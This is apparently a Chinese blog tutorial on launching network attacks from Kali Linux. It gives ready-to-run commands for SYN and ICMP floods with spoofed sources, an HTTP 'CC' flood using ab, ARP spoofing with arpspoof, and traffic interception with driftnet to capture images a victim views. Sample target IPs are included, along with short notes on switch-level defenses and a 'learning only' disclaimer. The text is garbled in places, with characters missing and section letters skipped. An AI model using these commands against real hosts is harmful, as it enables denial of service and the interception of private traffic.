1.什么是DOS/DDOS攻击/p>
DOS:拒绝服务攻击(Deny Of Service)
DDOS:DDOS攻击(Distributed denial of service attack)
一般来说DDOS攻击更难防御
自认为的区别:DOS是相当于一个进行攻击 而DDOS就是黑客控制了many肉鸡就是攻击
注:只是简单的了解,可以百度深入了解他们之间的区别
2.进入正题 kali攻击
a.tcp攻击(flood攻击)
命令:
hping3 –flood -S –rand-source 目标IP
如:hping3 –flood -S –rand-source 192.168.1.101
原理:
让kali做客户机,目标pc做服务端,kali发送大量的tcp 文,正常情况下pc需要给kali(客户机)发包确认,之后kali(客户机)不在进行给pc(服务机)回包,让目标pc处于一个半链接状态(不能连上 )!
如图:进行了 1,2步骤 没有进行第3步
扩展:
1)攻击DHCP服务器:频繁的发送伪装DHCP请求,直到将DHCP地址池资源耗尽
防御:在交换机(管理型)端口上做动态MAC地址绑定
2)伪装DHCP服务器攻击:黑客(hack)通过将自己部署为DHCP服务器,为客户机提供非法IP地址
防御:在交换机(管理型)上,除合法的DHCP服务器所在接口外,全部设置为禁止发送DHCP offer包
d.icmp flood攻击
命令:hping3 –icmp –rand-soure –flood -d 1400 目标ip
–icmp:攻击方式
–rand-soure:发起攻击的ip地址随机
-d: 文的大小(一般的ping 最大是1500字节,这里之所以用1400,因为ping 里面还有其他的东西)
如:hping3 –icmp –rand-soure –flood -d 1200 192.168.1.101
原理:就是发送大量的ping包,让服务器瘫痪。
e.CC攻击(web 压力测试)
命令:ab -n 100000 -c 1000 url
如:ab -n 100000 -c 10000 www.xxxx.com
原理:CC攻击 DDOS的一种(CC攻击:challenge collapsar 挑战黑洞 攻击。模拟多用户多线程请求较为耗CPU内存的URL)
(有点像每学期抢 课一样,si都进不去页面)
注意:这个命令只能用来学习,不能非法测试未授权的 站
f.ARP欺骗攻击
命令:arpspoof -i eth0 -t 目标iP kali 关ip
-i 卡 -t 目标ip 关
如:arpspoof -i eth0 -t 192.168.1.101 192.168.1.1
工具:ettercap(kali自带)
原理:用户服务物联 需要通过路由器的 关,这个时候给受害者发送arp 文,伪装上 的 关,受害者则认为kali攻击机的MAC地址是正常上 的Mac地址,则受害者给kali发送 文。kali可以在进行处理(转发/拦截)
g.ARP欺骗攻击获取照片
命令:
:arpspoof -t 目标iP kali 关ip
:echo 1 > /proc/sys/net/ipv4/ip_forward
:driftnet -i eth0
原理:arp欺骗攻击 加查看别人浏览的照片(没有加密)给受害者发送arp 文,伪装上 的 关。受害者则认为kali攻击机的mac地址是正常上 的Mac地址,则受害者给kali发送 文。kali可以在进行处理。
kali将 文发送出去可以让受害者上 {echo 1 > /proc/sys/net/ipv4/ip_forward},但是受害者的 文要经过kali,kali在利用:driftnet -i eth0,捕捉受害者浏览照片
总结
这部分主要是从 络上面进行攻击。
防御:基本上都是在交换机路由器上面配置,或者在自己电脑上面配置默认的 关(防止arp欺骗攻击)
这些命令只用于学习,不能非法测试别人pc或者 站!!!!
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!